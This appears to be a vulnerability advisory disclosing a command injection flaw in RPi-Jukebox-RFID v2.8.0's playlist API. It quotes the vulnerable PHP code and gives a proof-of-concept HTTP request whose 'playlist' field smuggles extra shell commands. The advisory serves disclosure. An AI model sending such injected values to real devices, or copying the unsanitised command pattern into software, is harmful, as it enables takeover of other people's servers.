### Key Information #### Vulnerability Description - **Vulnerability Type**: RCE (Remote Code Execution) - **Affected Software**: RPi-Jukebox-RFID v2.8.0 - **File**: `/htdocs/api/playlist/single.php` #### Vulnerability Details - **Problematic Code**: ```php $playlist = $_json['playlist']; $single = $_json['single']; if ($single == "true") { execScript("single_play.sh -c=singleenable -d=($playlist)"); } else { execScript("single_play.sh -c=singledisable -d=($playlist)"); } ``` - **Root Cause**: The `$playlist` variable is directly sourced from user input and concatenated into a system command without sufficient sanitization, leading to a command injection vulnerability. #### POC (Proof of Concept) ```http PUT /api/playlist/single.php HTTP/1.1 Host: 192.168.129.130 Content-Type: application/json Content-Length: 89 { "playlist": "test;id=2.txt;echo '123'", "single": "true" } ``` #### Impact - Attackers can execute arbitrary system commands by crafting malicious `playlist` parameters, thereby gaining control over the server. #### Vendor Information - **Vendor**: MiczFlor/RPi-Jukebox-RFID - **Description**: A jukebox system based on Raspberry Pi, supporting local music, podcasts, internet radio, and streaming, triggered via RFID cards, web applications, or home automation. - **Related Links**: [Release v2.8.0](https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0)